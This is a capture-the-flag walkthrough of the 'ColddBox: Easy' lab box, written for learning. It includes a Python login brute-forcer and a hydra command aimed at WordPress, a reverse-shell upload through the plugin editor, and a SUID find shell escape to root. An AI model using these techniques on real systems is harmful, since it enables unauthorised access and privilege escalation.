ColddBox: Easy
Reconnaissance
Initial nmap scan to find open ports, using the "treat all hosts as online" flag (-Pn) so nmap does not skip the target if it ignores ping probes.
Detailed Nmap Scan:
Command Breakdown:
(-sV): Service version detection
(-sC): Default nmap scripts
(-p): Specifying port 80
(-oN nmap): Saving the output in normal (human-readable) format to a file called nmap
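The file written by -oN is plain "normal" nmap output, and the WordPress version mentioned later in this walkthrough comes from the http-generator script line in it. As an added example (not code from the original post), here is a small parser for that format, run over a constructed sample modelled on this box's port 80 result: only the open http port and the "WordPress 4.1.31" value reflect what the page reports; the scan date, target IP, Apache banner, robots.txt entry and page title are placeholders.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of `nmap -sV -sC -p 80 -oN nmap <target>` normal output.
# Only port 80/http and the http-generator value mirror the page; everything else is a placeholder.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.80 scan initiated Sat Jan  1 00:00:00 2022 as: nmap -sV -sC -p 80 -oN nmap 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd
|_http-generator: WordPress 4.1.31
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: ColddBox | One more machine

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan  1 00:00:10 2022 -- 1 IP address (1 host up) scanned in 10.00 seconds
"""

# "80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# A script line starts with the script name followed by a colon; continuation lines do not.
SCRIPT_RE = re.compile(r"^([a-z0-9][a-z0-9.-]*):\s?(.*)$")


@dataclass
class PortInfo:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> output text


def parse_nmap_normal(text):
    """Parse nmap -oN output into {port_number: PortInfo}, keeping NSE script output per port."""
    ports = {}
    current = None          # PortInfo the following script lines belong to
    current_script = None   # script name for multi-line continuation
    for raw in text.splitlines():
        m = PORT_RE.match(raw)
        if m:
            current = PortInfo(int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5).strip())
            ports[current.port] = current
            current_script = None
            continue
        if raw.startswith("|") and current is not None:
            # nmap prefixes script lines with "| " and the last line of a script with "|_"
            body = raw[2:] if raw[:2] in ("|_", "| ") else raw[1:]
            sm = SCRIPT_RE.match(body)
            if sm:
                current_script = sm.group(1)
                current.scripts[current_script] = sm.group(2).strip()
            elif current_script is not None:
                current.scripts[current_script] += "\n" + body.strip()
            continue
        current_script = None  # any other line ends the script block
    return ports


def wordpress_version(ports):
    """Return the version advertised by the http-generator script, or None if absent."""
    for info in ports.values():
        m = re.match(r"WordPress\s+([\d.]+)", info.scripts.get("http-generator", ""))
        if m:
            return m.group(1)
    return None


if __name__ == "__main__":
    parsed = parse_nmap_normal(SAMPLE_NMAP_OUTPUT)
    for p in parsed.values():
        print(f"{p.port}/{p.proto} {p.state} {p.service} {p.version}")
        for name, out in p.scripts.items():
            print(f"  {name}: {out.splitlines()[0]}")
    print("WordPress version:", wordpress_version(parsed))
```

The http-generator value is whatever the site puts in its generator meta tag, so it can be removed or faked by the site owner; wpscan's own fingerprinting (readme.html, asset version strings) is the cross-check, which is what the next section does.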
Enumeration
Let's visit the site.
It looks like a well-made page. While looking through the website, I found a login page.
Also, from the nmap scan we know that WordPress 4.1.31 is running. There is a WordPress scanner called wpscan; let's use it to find more information (installed version, themes and plugins, and enumerated usernames).
Looking at the output, we find some interesting information, including a list of usernames.
Let's use hydra to brute-force the WordPress login and find at least one password for one of the users. I saved the usernames in a file called users.
Exploitation
Let's now use hydra to crack the password.
And we get the password. Let's log in.
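What hydra does against wp-login.php is simple: POST each username/password pair as the `log` and `pwd` form fields and decide success from the response. As an added example (not from the original post, and not a replacement for hydra) here is that loop in Python, run against a small in-process mock of wp-login.php so it works offline. The mock mirrors real WordPress behaviour: a failed login returns 200 with a `<div id="login_error">` block, a successful one returns a 302 to /wp-admin/ with a `wordpress_logged_in_*` cookie. The usernames, wordlist and the mock's valid credential are constructed placeholders, not this box's real accounts.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-ins for the `users` file and a small wordlist (not the box's real data).
USERS = ["alice", "bob", "carol"]
PASSWORDS = ["123456", "Password1", "letmein"]
FAIL_MARKER = "login_error"  # same idea as hydra's http-post-form ":F=login_error" failure string

# Hypothetical valid credential known only to the mock target.
MOCK_VALID = {"bob": "Password1"}


class FakeWPLogin(BaseHTTPRequestHandler):
    """Minimal imitation of WordPress wp-login.php for offline testing."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        password = form.get("pwd", [""])[0]
        if self.path == "/wp-login.php" and MOCK_VALID.get(user) == password:
            self.send_response(302)  # WordPress redirects to the dashboard on success
            self.send_header("Location", "/wp-admin/")
            self.send_header("Set-Cookie", "wordpress_logged_in_mock=1; path=/")
            self.end_headers()
            return
        body = (b'<html><body><div id="login_error"><strong>ERROR</strong>: '
                b'Incorrect password.</div></body></html>')
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the test output quiet
        pass


def start_mock_server():
    """Start the fake wp-login.php on a random localhost port; returns (server, base_url)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), FakeWPLogin)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 302 visible instead of following it; urllib then raises HTTPError(302)."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def try_login(base_url, user, password, timeout=5):
    """One wp-login.php attempt. True only if the response looks like a real WordPress login."""
    data = urllib.parse.urlencode({"log": user, "pwd": password,
                                   "wp-submit": "Log In", "testcookie": "1"}).encode()
    req = urllib.request.Request(base_url + "/wp-login.php", data=data, method="POST")
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            # hydra's F= semantics: a 200 without the failure marker counts as success.
            # A lockout or captcha page would also lack it, so treat 200 as weak evidence.
            return FAIL_MARKER not in resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        # Strong evidence: the redirect WordPress issues only after a successful login.
        location = err.headers.get("Location") or ""
        return err.code == 302 and "wp-login.php" not in location


def brute_force(base_url, users, passwords):
    """Try every pair; like hydra's default, stop on the first hit per user."""
    found = {}
    for user in users:
        for password in passwords:
            if try_login(base_url, user, password):
                found[user] = password
                break
    return found


if __name__ == "__main__":
    server, url = start_mock_server()
    try:
        print(brute_force(url, USERS, PASSWORDS))
    finally:
        server.shutdown()
```

The equivalent hydra invocation has the form `hydra -L users -P wordlist.txt TARGET http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=login_error"`. Note the two different success signals in `try_login`: hydra only knows that the failure string was absent, which is why a rate-limiting plugin or a WAF block page can show up as false positives; checking for the 302 to wp-admin is the confirmation to add.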
We are logged in. To get a reverse shell on the machine, we have to upload a PHP reverse shell, which you can find here. First go to the Plugins
tab, open the plugin editor and replace the contents of one of the plugin files with the PHP reverse shell; also make sure to change the IP (and port) to your listener's.
After changing it, click Update File and start a netcat listener on that port.
Then navigate to the page of the plugin file you edited so that the PHP executes.
You should get a reverse shell. Let's stabilize the shell.
Privilege Escalation
Let's look for SUID binaries that we can exploit.
We have /usr/bin/find, so let's go to GTFOBins and find the command to escalate privileges.
Let's use the second command.
We are now root.
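The SUID hunt above is normally a one-liner (`find / -perm -4000 -type f 2>/dev/null`), but the interesting part is what you do with the list: check who owns each hit and whether GTFOBins has an entry for it. As an added example (not from the original post), here is that enumeration in Python, including a constructed directory tree with a fake SUID `find` so it can be checked offline; the GTFOBins name list is a subset from memory and should be treated as an assumption.

```python
import os
import stat
import tempfile

# Subset of binaries that GTFOBins lists under "SUID" (assumption from memory; confirm the
# current list and the exact commands at https://gtfobins.github.io).
GTFOBINS_SUID = {
    "find", "vim", "bash", "python", "python3", "nmap", "env", "cp", "mv",
    "less", "more", "awk", "perl", "php", "nano", "tee", "base64", "xxd",
}

SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")  # pseudo-filesystems, not worth walking


def find_suid_binaries(root="/", skip=SKIP_DIRS):
    """Python equivalent of `find ROOT -perm -4000 -type f` that also reports SGID."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        if any(dirpath == s or dirpath.startswith(s + os.sep) for s in skip):
            dirnames[:] = []  # prune the walk below this directory
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: report the link itself, never follow it
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, sockets etc. are not SUID executables
            is_suid = bool(st.st_mode & stat.S_ISUID)
            is_sgid = bool(st.st_mode & stat.S_ISGID)
            if is_suid or is_sgid:
                hits.append({
                    "path": path,
                    "name": name,
                    "owner_uid": st.st_uid,      # 0 means root-owned, the case that matters
                    "suid": is_suid,
                    "sgid": is_sgid,
                    "gtfobins": name in GTFOBINS_SUID,
                })
    return hits


def gtfobins_candidates(hits, root_only=False):
    """Names of SUID hits with a GTFOBins entry; root_only keeps just root-owned files."""
    return sorted({
        h["name"] for h in hits
        if h["suid"] and h["gtfobins"] and (h["owner_uid"] == 0 or not root_only)
    })


def make_demo_tree():
    """Constructed tree for offline testing: a fake SUID `find`, a normal `ls`, and a symlink
    to the SUID file that lstat must not count as a second hit."""
    base = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(base, "bin")
    os.mkdir(bindir)
    for name, mode in (("find", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    os.symlink(os.path.join(bindir, "find"), os.path.join(bindir, "find-link"))
    return base


if __name__ == "__main__":
    for h in find_suid_binaries("/"):
        tag = "  <- on GTFOBins" if h["gtfobins"] else ""
        print(f"{h['path']} (owner uid {h['owner_uid']}, suid={h['suid']}, sgid={h['sgid']}){tag}")
```

Only root-owned SUID files give root; a SUID binary owned by another user gives that user instead, which is why the owner uid is recorded. For `find`, the GTFOBins SUID entry spawns a shell via `-exec /bin/sh -p \; -quit`; the `-p` flag matters because without it sh/bash drop the elevated effective uid on startup.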